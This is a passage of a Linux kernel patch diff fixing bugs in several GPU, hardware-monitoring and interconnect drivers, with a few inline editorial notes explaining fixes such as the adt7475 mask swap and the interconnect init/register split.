+index aa87d3832d60d..d7e8c374f153e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_sseu.h
++++ b/drivers/gpu/drm/i915/gt/intel_sseu.h
+@@ -27,7 +27,7 @@ struct drm_printer;
+  * is only relevant to pre-Xe_HP platforms (Xe_HP and beyond use the
+  * I915_MAX_SS_FUSE_BITS value below).
+  */
+-#define GEN_MAX_SS_PER_HSW_SLICE	6
++#define GEN_MAX_SS_PER_HSW_SLICE	8
+ 
+ /*
+  * Maximum number of 32-bit registers used by hardware to express the
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index 7412abf166a8c..a9fea115f2d26 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -422,12 +422,12 @@ replace_barrier(struct i915_active *ref, struct i915_active_fence *active)
+ 	 * we can use it to substitute for the pending idle-barrier
+ 	 * request that we want to emit on the kernel_context.
+ 	 */
+-	__active_del_barrier(ref, node_from_active(active));
+-	return true;
++	return __active_del_barrier(ref, node_from_active(active));
+ }
+ 
+ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ {
++	u64 idx = i915_request_timeline(rq)->fence_context;
+ 	struct dma_fence *fence = &rq->fence;
+ 	struct i915_active_fence *active;
+ 	int err;
+@@ -437,16 +437,19 @@ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ 	if (err)
+ 		return err;
+ 
+-	active = active_instance(ref, i915_request_timeline(rq)->fence_context);
+-	if (!active) {
+-		err = -ENOMEM;
+-		goto out;
+-	}
++	do {
++		active = active_instance(ref, idx);
++		if (!active) {
++			err = -ENOMEM;
++			goto out;
++		}
++
++		if (replace_barrier(ref, active)) {
++			RCU_INIT_POINTER(active->fence, NULL);
++			atomic_dec(&ref->count);
++		}
++	} while (unlikely(is_barrier(active)));
+ 
+-	if (replace_barrier(ref, active)) {
+-		RCU_INIT_POINTER(active->fence, NULL);
+-		atomic_dec(&ref->count);
+-	}
+ 	if (!__i915_active_fence_set(active, fence))
+ 		__i915_active_acquire(ref);
+ 
+diff --git a/drivers/gpu/drm/meson/meson_vpp.c b/drivers/gpu/drm/meson/meson_vpp.c
+index 154837688ab0d..5df1957c8e41f 100644
+--- a/drivers/gpu/drm/meson/meson_vpp.c
++++ b/drivers/gpu/drm/meson/meson_vpp.c
+@@ -100,6 +100,8 @@ void meson_vpp_init(struct meson_drm *priv)
+ 			       priv->io_base + _REG(VPP_DOLBY_CTRL));
+ 		writel_relaxed(0x1020080,
+ 				priv->io_base + _REG(VPP_DUMMY_DATA1));
++		writel_relaxed(0x42020,
++				priv->io_base + _REG(VPP_DUMMY_DATA));
+ 	} else if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+ 		writel_relaxed(0xf, priv->io_base + _REG(DOLBY_PATH_CTRL));
+ 
+diff --git a/drivers/gpu/drm/msm/msm_gem_shrinker.c b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+index 1de14e67f96b0..31f054c903a43 100644
+--- a/drivers/gpu/drm/msm/msm_gem_shrinker.c
++++ b/drivers/gpu/drm/msm/msm_gem_shrinker.c
+@@ -107,6 +107,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 		bool (*shrink)(struct drm_gem_object *obj);
+ 		bool cond;
+ 		unsigned long freed;
++		unsigned long remaining;
+ 	} stages[] = {
+ 		/* Stages of progressively more aggressive/expensive reclaim: */
+ 		{ &priv->lru.dontneed, purge,        true },
+@@ -116,14 +117,18 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 	};
+ 	long nr = sc->nr_to_scan;
+ 	unsigned long freed = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (unsigned i = 0; (nr > 0) && (i < ARRAY_SIZE(stages)); i++) {
+ 		if (!stages[i].cond)
+ 			continue;
+ 		stages[i].freed =
+-			drm_gem_lru_scan(stages[i].lru, nr, stages[i].shrink);
++			drm_gem_lru_scan(stages[i].lru, nr,
++					&stages[i].remaining,
++					 stages[i].shrink);
+ 		nr -= stages[i].freed;
+ 		freed += stages[i].freed;
++		remaining += stages[i].remaining;
+ 	}
+ 
+ 	if (freed) {
+@@ -132,7 +137,7 @@ msm_gem_shrinker_scan(struct shrinker *shrinker, struct shrink_control *sc)
+ 				     stages[3].freed);
+ 	}
+ 
+-	return (freed > 0) ? freed : SHRINK_STOP;
++	return (freed > 0 && remaining > 0) ? freed : SHRINK_STOP;
+ }
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -182,10 +187,12 @@ msm_gem_shrinker_vmap(struct notifier_block *nb, unsigned long event, void *ptr)
+ 		NULL,
+ 	};
+ 	unsigned idx, unmapped = 0;
++	unsigned long remaining = 0;
+ 
+ 	for (idx = 0; lrus[idx] && unmapped < vmap_shrink_limit; idx++) {
+ 		unmapped += drm_gem_lru_scan(lrus[idx],
+ 					     vmap_shrink_limit - unmapped,
++					     &remaining,
+ 					     vmap_shrink);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 4e83a1891f3ed..666a5e53fe193 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -282,7 +282,7 @@ static void panfrost_mmu_flush_range(struct panfrost_device *pfdev,
+ 	if (pm_runtime_active(pfdev->dev))
+ 		mmu_hw_do_operation(pfdev, mmu, iova, size, AS_COMMAND_FLUSH_PT);
+ 
+-	pm_runtime_put_sync_autosuspend(pfdev->dev);
++	pm_runtime_put_autosuspend(pfdev->dev);
+ }
+ 
+ static int mmu_map_sg(struct panfrost_device *pfdev, struct panfrost_mmu *mmu,
+diff --git a/drivers/gpu/drm/sun4i/sun4i_drv.c b/drivers/gpu/drm/sun4i/sun4i_drv.c
+index d06ffd99d86e1..7910c5853f0a8 100644
+--- a/drivers/gpu/drm/sun4i/sun4i_drv.c
++++ b/drivers/gpu/drm/sun4i/sun4i_drv.c
+@@ -95,12 +95,12 @@ static int sun4i_drv_bind(struct device *dev)
+ 	/* drm_vblank_init calls kcalloc, which can fail */
+ 	ret = drm_vblank_init(drm, drm->mode_config.num_crtc);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	/* Remove early framebuffers (ie. simplefb) */
+ 	ret = drm_aperture_remove_framebuffers(false, &sun4i_drv_driver);
+ 	if (ret)
+-		goto cleanup_mode_config;
++		goto unbind_all;
+ 
+ 	sun4i_framebuffer_init(drm);
+ 
+@@ -119,6 +119,8 @@ static int sun4i_drv_bind(struct device *dev)
+ 
+ finish_poll:
+ 	drm_kms_helper_poll_fini(drm);
++unbind_all:
++	component_unbind_all(dev, NULL);
+ cleanup_mode_config:
+ 	drm_mode_config_cleanup(drm);
+ 	of_reserved_mem_device_release(dev);
+diff --git a/drivers/gpu/drm/ttm/ttm_device.c b/drivers/gpu/drm/ttm/ttm_device.c
+index e7147e3046378..b84f74807ca13 100644
+--- a/drivers/gpu/drm/ttm/ttm_device.c
++++ b/drivers/gpu/drm/ttm/ttm_device.c
+@@ -158,7 +158,7 @@ int ttm_device_swapout(struct ttm_device *bdev, struct ttm_operation_ctx *ctx,
+ 			struct ttm_buffer_object *bo = res->bo;
+ 			uint32_t num_pages;
+ 
+-			if (!bo)
++			if (!bo || bo->resource != res)
+ 				continue;
+ 
+ 			num_pages = PFN_UP(bo->base.size);
+diff --git a/drivers/gpu/drm/virtio/virtgpu_vq.c b/drivers/gpu/drm/virtio/virtgpu_vq.c
+index 9ff8660b50ade..208e9434cb28d 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_vq.c
++++ b/drivers/gpu/drm/virtio/virtgpu_vq.c
+@@ -597,7 +597,7 @@ void virtio_gpu_cmd_transfer_to_host_2d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+@@ -1019,7 +1019,7 @@ void virtio_gpu_cmd_transfer_to_host_3d(struct virtio_gpu_device *vgdev,
+ 	bool use_dma_api = !virtio_has_dma_quirk(vgdev->vdev);
+ 
+ 	if (virtio_gpu_is_shmem(bo) && use_dma_api)
+-		dma_sync_sgtable_for_device(&vgdev->vdev->dev,
++		dma_sync_sgtable_for_device(vgdev->vdev->dev.parent,
+ 					    bo->base.sgt, DMA_TO_DEVICE);
+ 
+ 	cmd_p = virtio_gpu_alloc_cmd(vgdev, &vbuf, sizeof(*cmd_p));
+diff --git a/drivers/hwmon/adt7475.c b/drivers/hwmon/adt7475.c
+index 51b3d16c32233..6e4c92b500b8e 100644
+--- a/drivers/hwmon/adt7475.c
++++ b/drivers/hwmon/adt7475.c
+@@ -488,10 +488,10 @@ static ssize_t temp_store(struct device *dev, struct device_attribute *attr,
+ 		val = (temp - val) / 1000;
+ 
+ 		if (sattr->index != 1) {
+-			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
++			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF) << 4;
+ 		} else {
+-			data->temp[HYSTERSIS][sattr->index] &= 0x0F;
++			data->temp[HYSTERSIS][sattr->index] &= 0xF0;
+ 			data->temp[HYSTERSIS][sattr->index] |= (val & 0xF);
+ 		}
+ 
+@@ -556,11 +556,11 @@ static ssize_t temp_st_show(struct device *dev, struct device_attribute *attr,
+ 		val = data->enh_acoustics[0] & 0xf;
+ 		break;
+ 	case 1:
+-		val = (data->enh_acoustics[1] >> 4) & 0xf;
++		val = data->enh_acoustics[1] & 0xf;
+ 		break;
+ 	case 2:
+ 	default:
+-		val = data->enh_acoustics[1] & 0xf;
++		val = (data->enh_acoustics[1] >> 4) & 0xf;
+ 		break;
+ 	}
+ 
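
[Editorial note, not part of the patch] The adt7475 fix swaps two AND masks: to rewrite one packed 4-bit hysteresis field you must keep the *other* nibble, so the high-nibble update keeps 0x0F and the low-nibble update keeps 0xF0, not the reverse. A tiny sketch of the corrected read-modify-write:

	#include <stdint.h>

	/* Write val into the high nibble, preserving the low one. */
	static uint8_t set_high_nibble(uint8_t reg, uint8_t val)
	{
		return (reg & 0x0F) | ((val & 0xF) << 4);
	}

	/* Write val into the low nibble, preserving the high one. */
	static uint8_t set_low_nibble(uint8_t reg, uint8_t val)
	{
		return (reg & 0xF0) | (val & 0xF);
	}
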
+diff --git a/drivers/hwmon/ina3221.c b/drivers/hwmon/ina3221.c
+index e06186986444e..f3a4c5633b1ea 100644
+--- a/drivers/hwmon/ina3221.c
++++ b/drivers/hwmon/ina3221.c
+@@ -772,7 +772,7 @@ static int ina3221_probe_child_from_dt(struct device *dev,
+ 		return ret;
+ 	} else if (val > INA3221_CHANNEL3) {
+ 		dev_err(dev, "invalid reg %d of %pOFn\n", val, child);
+-		return ret;
++		return -EINVAL;
+ 	}
+ 
+ 	input = &ina->inputs[val];
+diff --git a/drivers/hwmon/ltc2992.c b/drivers/hwmon/ltc2992.c
+index 72489d5d7eaf9..d88e883c7492c 100644
+--- a/drivers/hwmon/ltc2992.c
++++ b/drivers/hwmon/ltc2992.c
+@@ -323,6 +323,7 @@ static int ltc2992_config_gpio(struct ltc2992_state *st)
+ 	st->gc.label = name;
+ 	st->gc.parent = &st->client->dev;
+ 	st->gc.owner = THIS_MODULE;
++	st->gc.can_sleep = true;
+ 	st->gc.base = -1;
+ 	st->gc.names = st->gpio_names;
+ 	st->gc.ngpio = ARRAY_SIZE(st->gpio_names);
+diff --git a/drivers/hwmon/pmbus/adm1266.c b/drivers/hwmon/pmbus/adm1266.c
+index ec5f932fc6f0f..1ac2b2f4c5705 100644
+--- a/drivers/hwmon/pmbus/adm1266.c
++++ b/drivers/hwmon/pmbus/adm1266.c
+@@ -301,6 +301,7 @@ static int adm1266_config_gpio(struct adm1266_data *data)
+ 	data->gc.label = name;
+ 	data->gc.parent = &data->client->dev;
+ 	data->gc.owner = THIS_MODULE;
++	data->gc.can_sleep = true;
+ 	data->gc.base = -1;
+ 	data->gc.names = data->gpio_names;
+ 	data->gc.ngpio = ARRAY_SIZE(data->gpio_names);
+diff --git a/drivers/hwmon/pmbus/ucd9000.c b/drivers/hwmon/pmbus/ucd9000.c
+index 75fc770c9e403..3daaf22378322 100644
+--- a/drivers/hwmon/pmbus/ucd9000.c
++++ b/drivers/hwmon/pmbus/ucd9000.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/debugfs.h>
++#include <linux/delay.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -16,6 +17,7 @@
+ #include <linux/i2c.h>
+ #include <linux/pmbus.h>
+ #include <linux/gpio/driver.h>
++#include <linux/timekeeping.h>
+ #include "pmbus.h"
+ 
+ enum chips { ucd9000, ucd90120, ucd90124, ucd90160, ucd90320, ucd9090,
+@@ -65,6 +67,7 @@ struct ucd9000_data {
+ 	struct gpio_chip gpio;
+ #endif
+ 	struct dentry *debugfs;
++	ktime_t write_time;
+ };
+ #define to_ucd9000_data(_info) container_of(_info, struct ucd9000_data, info)
+ 
+@@ -73,6 +76,73 @@ struct ucd9000_debugfs_entry {
+ 	u8 index;
+ };
+ 
++/*
++ * It has been observed that the UCD90320 randomly fails register access when
++ * doing another access right on the back of a register write. To mitigate this,
++ * make sure that there is a minimum delay between a write access and the
++ * following access. The 250us is based on experimental data. At a delay of
++ * 200us the issue seems to go away. Add a bit of extra margin to allow for
++ * system-to-system differences.
++ */
++#define UCD90320_WAIT_DELAY_US 250
++
++static inline void ucd90320_wait(const struct ucd9000_data *data)
++{
++	s64 delta = ktime_us_delta(ktime_get(), data->write_time);
++
++	if (delta < UCD90320_WAIT_DELAY_US)
++		udelay(UCD90320_WAIT_DELAY_US - delta);
++}
++
++static int ucd90320_read_word_data(struct i2c_client *client, int page,
++				   int phase, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	if (reg >= PMBUS_VIRT_BASE)
++		return -ENXIO;
++
++	ucd90320_wait(data);
++	return pmbus_read_word_data(client, page, phase, reg);
++}
++
++static int ucd90320_read_byte_data(struct i2c_client *client, int page, int reg)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++
++	ucd90320_wait(data);
++	return pmbus_read_byte_data(client, page, reg);
++}
++
++static int ucd90320_write_word_data(struct i2c_client *client, int page,
++				    int reg, u16 word)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_word_data(client, page, reg, word);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
++static int ucd90320_write_byte(struct i2c_client *client, int page, u8 value)
++{
++	const struct pmbus_driver_info *info = pmbus_get_driver_info(client);
++	struct ucd9000_data *data = to_ucd9000_data(info);
++	int ret;
++
++	ucd90320_wait(data);
++	ret = pmbus_write_byte(client, page, value);
++	data->write_time = ktime_get();
++
++	return ret;
++}
++
+ static int ucd9000_get_fan_config(struct i2c_client *client, int fan)
+ {
+ 	int fan_config = 0;
+@@ -598,6 +668,11 @@ static int ucd9000_probe(struct i2c_client *client)
+ 		info->read_byte_data = ucd9000_read_byte_data;
+ 		info->func[0] |= PMBUS_HAVE_FAN12 | PMBUS_HAVE_STATUS_FAN12
+ 		  | PMBUS_HAVE_FAN34 | PMBUS_HAVE_STATUS_FAN34;
++	} else if (mid->driver_data == ucd90320) {
++		info->read_byte_data = ucd90320_read_byte_data;
++		info->read_word_data = ucd90320_read_word_data;
++		info->write_byte = ucd90320_write_byte;
++		info->write_word_data = ucd90320_write_word_data;
+ 	}
+ 
+ 	ucd9000_probe_gpio(client, mid, data);
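
[Editorial note, not part of the patch] The ucd90320 workaround timestamps every write and, before the next transaction, sleeps off whatever is left of the 250us window. The same pattern in hedged userspace form (clock_gettime()/usleep() replacing ktime_get()/udelay()):

	#include <stdint.h>
	#include <time.h>
	#include <unistd.h>

	#define WAIT_DELAY_US 250	/* experimentally derived margin */

	static int64_t last_write_us;

	static int64_t now_us(void)
	{
		struct timespec ts;

		clock_gettime(CLOCK_MONOTONIC, &ts);
		return (int64_t)ts.tv_sec * 1000000 + ts.tv_nsec / 1000;
	}

	/* Call before any register access: burn off the remainder of
	 * the back-off window started by the last write. */
	static void throttle(void)
	{
		int64_t delta = now_us() - last_write_us;

		if (delta < WAIT_DELAY_US)
			usleep(WAIT_DELAY_US - delta);
	}

	/* Call after a write completes: restart the window. */
	static void note_write(void)
	{
		last_write_us = now_us();
	}
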
+diff --git a/drivers/hwmon/tmp513.c b/drivers/hwmon/tmp513.c
+index 47bbe47e062fd..7d5f7441aceb1 100644
+--- a/drivers/hwmon/tmp513.c
++++ b/drivers/hwmon/tmp513.c
+@@ -758,7 +758,7 @@ static int tmp51x_probe(struct i2c_client *client)
+ static struct i2c_driver tmp51x_driver = {
+ 	.driver = {
+ 		.name	= "tmp51x",
+-		.of_match_table = of_match_ptr(tmp51x_of_match),
++		.of_match_table = tmp51x_of_match,
+ 	},
+ 	.probe_new	= tmp51x_probe,
+ 	.id_table	= tmp51x_id,
+diff --git a/drivers/hwmon/xgene-hwmon.c b/drivers/hwmon/xgene-hwmon.c
+index 5cde837bfd094..d1abea49f01be 100644
+--- a/drivers/hwmon/xgene-hwmon.c
++++ b/drivers/hwmon/xgene-hwmon.c
+@@ -761,6 +761,7 @@ static int xgene_hwmon_remove(struct platform_device *pdev)
+ {
+ 	struct xgene_hwmon_dev *ctx = platform_get_drvdata(pdev);
+ 
++	cancel_work_sync(&ctx->workq);
+ 	hwmon_device_unregister(ctx->hwmon_dev);
+ 	kfifo_free(&ctx->async_msg_fifo);
+ 	if (acpi_disabled)
+diff --git a/drivers/interconnect/core.c b/drivers/interconnect/core.c
+index 25debded65a8f..cfa52c6369d05 100644
+--- a/drivers/interconnect/core.c
++++ b/drivers/interconnect/core.c
+@@ -850,6 +850,10 @@ void icc_node_destroy(int id)
+ 
+ 	mutex_unlock(&icc_lock);
+ 
++	if (!node)
++		return;
++
++	kfree(node->links);
+ 	kfree(node);
+ }
+ EXPORT_SYMBOL_GPL(icc_node_destroy);
+@@ -1029,54 +1033,68 @@ int icc_nodes_remove(struct icc_provider *provider)
+ EXPORT_SYMBOL_GPL(icc_nodes_remove);
+ 
+ /**
+- * icc_provider_add() - add a new interconnect provider
+- * @provider: the interconnect provider that will be added into topology
++ * icc_provider_init() - initialize a new interconnect provider
++ * @provider: the interconnect provider to initialize
++ *
++ * Must be called before adding nodes to the provider.
++ */
++void icc_provider_init(struct icc_provider *provider)
++{
++	WARN_ON(!provider->set);
++
++	INIT_LIST_HEAD(&provider->nodes);
++}
++EXPORT_SYMBOL_GPL(icc_provider_init);
++
++/**
++ * icc_provider_register() - register a new interconnect provider
++ * @provider: the interconnect provider to register
+  *
+  * Return: 0 on success, or an error code otherwise
+  */
+-int icc_provider_add(struct icc_provider *provider)
++int icc_provider_register(struct icc_provider *provider)
+ {
+-	if (WARN_ON(!provider->set))
+-		return -EINVAL;
+ 	if (WARN_ON(!provider->xlate && !provider->xlate_extended))
+ 		return -EINVAL;
+ 
+ 	mutex_lock(&icc_lock);
+-
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	list_add_tail(&provider->provider_list, &icc_providers);
+-
+ 	mutex_unlock(&icc_lock);
+ 
+-	dev_dbg(provider->dev, "interconnect provider added to topology\n");
++	dev_dbg(provider->dev, "interconnect provider registered\n");
+ 
+ 	return 0;
+ }
+-EXPORT_SYMBOL_GPL(icc_provider_add);
++EXPORT_SYMBOL_GPL(icc_provider_register);
+ 
+ /**
+- * icc_provider_del() - delete previously added interconnect provider
+- * @provider: the interconnect provider that will be removed from topology
++ * icc_provider_deregister() - deregister an interconnect provider
++ * @provider: the interconnect provider to deregister
+  */
+-void icc_provider_del(struct icc_provider *provider)
++void icc_provider_deregister(struct icc_provider *provider)
+ {
+ 	mutex_lock(&icc_lock);
+-	if (provider->users) {
+-		pr_warn("interconnect provider still has %d users\n",
+-			provider->users);
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
+-
+-	if (!list_empty(&provider->nodes)) {
+-		pr_warn("interconnect provider still has nodes\n");
+-		mutex_unlock(&icc_lock);
+-		return;
+-	}
++	WARN_ON(provider->users);
+ 
+ 	list_del(&provider->provider_list);
+ 	mutex_unlock(&icc_lock);
+ }
++EXPORT_SYMBOL_GPL(icc_provider_deregister);
++
++int icc_provider_add(struct icc_provider *provider)
++{
++	icc_provider_init(provider);
++
++	return icc_provider_register(provider);
++}
++EXPORT_SYMBOL_GPL(icc_provider_add);
++
++void icc_provider_del(struct icc_provider *provider)
++{
++	WARN_ON(!list_empty(&provider->nodes));
++
++	icc_provider_deregister(provider);
++}
+ EXPORT_SYMBOL_GPL(icc_provider_del);
+ 
+ static int of_count_icc_providers(struct device_node *np)
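
[Editorial note, not part of the patch] The interconnect series splits icc_provider_add() into icc_provider_init() (local setup, before any nodes exist) and icc_provider_register() (publication on the global list, once the whole topology is built), so a racing lookup can never observe a half-populated provider. A compilable stand-in for that two-phase pattern (locking elided; these names are not the real icc_* API):

	#include <errno.h>
	#include <stdbool.h>

	struct prov {
		int nr_nodes;
		bool published;	/* visible to consumers? */
	};

	static void prov_init(struct prov *p)
	{
		p->nr_nodes = 0;
		p->published = false;
	}

	static int prov_add_node(struct prov *p)
	{
		p->nr_nodes++;	/* build topology while still private */
		return 0;
	}

	/* Publish last, once every node and link exists. */
	static int prov_register(struct prov *p)
	{
		if (!p->nr_nodes)
			return -EINVAL;
		p->published = true;
		return 0;
	}

	/* Probe order the drivers converge on; teardown runs in the
	 * exact reverse: deregister first, then remove nodes. */
	static int probe(struct prov *p)
	{
		int err;

		prov_init(p);
		err = prov_add_node(p);
		if (err)
			return err;
		return prov_register(p);
	}
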
+diff --git a/drivers/interconnect/imx/imx.c b/drivers/interconnect/imx/imx.c
+index 823d9be9771a1..979ed610f704b 100644
+--- a/drivers/interconnect/imx/imx.c
++++ b/drivers/interconnect/imx/imx.c
+@@ -295,6 +295,9 @@ int imx_icc_register(struct platform_device *pdev,
+ 	provider->xlate = of_icc_xlate_onecell;
+ 	provider->data = data;
+ 	provider->dev = dev->parent;
++
++	icc_provider_init(provider);
++
+ 	platform_set_drvdata(pdev, imx_provider);
+ 
+ 	if (settings) {
+@@ -306,20 +309,18 @@ int imx_icc_register(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
++	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	if (ret)
+ 		return ret;
+-	}
+ 
+-	ret = imx_icc_register_nodes(imx_provider, nodes, nodes_count, settings);
++	ret = icc_provider_register(provider);
+ 	if (ret)
+-		goto provider_del;
++		goto err_unregister_nodes;
+ 
+ 	return 0;
+ 
+-provider_del:
+-	icc_provider_del(provider);
++err_unregister_nodes:
++	imx_icc_unregister_nodes(&imx_provider->provider);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_register);
+@@ -328,9 +329,8 @@ void imx_icc_unregister(struct platform_device *pdev)
+ {
+ 	struct imx_icc_provider *imx_provider = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&imx_provider->provider);
+ 	imx_icc_unregister_nodes(&imx_provider->provider);
+-
+-	icc_provider_del(&imx_provider->provider);
+ }
+ EXPORT_SYMBOL_GPL(imx_icc_unregister);
+ 
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index 39e43b9575998..6a9e6b563320b 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -506,7 +506,6 @@ regmap_done:
+ 	}
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+ 	provider->pre_aggregate = qcom_icc_pre_bw_aggregate;
+@@ -514,12 +513,7 @@ regmap_done:
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+ 	provider->data = data;
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(dev, "error adding interconnect provider: %d\n", ret);
+-		clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-		return ret;
+-	}
++	icc_provider_init(provider);
+ 
+ 	for (i = 0; i < num_nodes; i++) {
+ 		size_t j;
+@@ -527,7 +521,7 @@ regmap_done:
+ 		node = icc_node_create(qnodes[i]->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qnodes[i]->name;
+@@ -541,17 +535,26 @@ regmap_done:
+ 	}
+ 	data->num_nodes = num_nodes;
+ 
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(provider);
+ 
+ 	return ret;
+ }
+@@ -561,9 +564,9 @@ int qnoc_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+ 	clk_bulk_disable_unprepare(qp->num_clks, qp->bus_clks);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/icc-rpmh.c b/drivers/interconnect/qcom/icc-rpmh.c
+index fd17291c61eb9..fdb5e58e408b4 100644
+--- a/drivers/interconnect/qcom/icc-rpmh.c
++++ b/drivers/interconnect/qcom/icc-rpmh.c
+@@ -192,9 +192,10 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	provider->pre_aggregate = qcom_icc_pre_aggregate;
+ 	provider->aggregate = qcom_icc_aggregate;
+ 	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->data = data;
+ 
++	icc_provider_init(provider);
++
+ 	qp->dev = dev;
+ 	qp->bcms = desc->bcms;
+ 	qp->num_bcms = desc->num_bcms;
+@@ -203,10 +204,6 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	if (IS_ERR(qp->voter))
+ 		return PTR_ERR(qp->voter);
+ 
+-	ret = icc_provider_add(provider);
+-	if (ret)
+-		return ret;
+-
+ 	for (i = 0; i < qp->num_bcms; i++)
+ 		qcom_icc_bcm_init(qp->bcms[i], dev);
+ 
+@@ -218,7 +215,7 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 		node = icc_node_create(qn->id);
+ 		if (IS_ERR(node)) {
+ 			ret = PTR_ERR(node);
+-			goto err;
++			goto err_remove_nodes;
+ 		}
+ 
+ 		node->name = qn->name;
+@@ -232,16 +229,27 @@ int qcom_icc_rpmh_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	data->num_nodes = num_nodes;
++
++	ret = icc_provider_register(provider);
++	if (ret)
++		goto err_remove_nodes;
++
+ 	platform_set_drvdata(pdev, qp);
+ 
+ 	/* Populate child NoC devices if any */
+-	if (of_get_child_count(dev->of_node) > 0)
+-		return of_platform_populate(dev->of_node, NULL, NULL, dev);
++	if (of_get_child_count(dev->of_node) > 0) {
++		ret = of_platform_populate(dev->of_node, NULL, NULL, dev);
++		if (ret)
++			goto err_deregister_provider;
++	}
+ 
+ 	return 0;
+-err:
++
++err_deregister_provider:
++	icc_provider_deregister(provider);
++err_remove_nodes:
+ 	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(qcom_icc_rpmh_probe);
+@@ -250,8 +258,8 @@ int qcom_icc_rpmh_remove(struct platform_device *pdev)
+ {
+ 	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+ 
++	icc_provider_deregister(&qp->provider);
+ 	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/interconnect/qcom/msm8974.c b/drivers/interconnect/qcom/msm8974.c
+index 5ea192f1141dc..1828deaca4432 100644
+--- a/drivers/interconnect/qcom/msm8974.c
++++ b/drivers/interconnect/qcom/msm8974.c
+@@ -692,7 +692,6 @@ static int msm8974_icc_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	provider = &qp->provider;
+-	INIT_LIST_HEAD(&provider->nodes);
+ 	provider->dev = dev;
+ 	provider->set = msm8974_icc_set;
+ 	provider->aggregate = icc_std_aggregate;
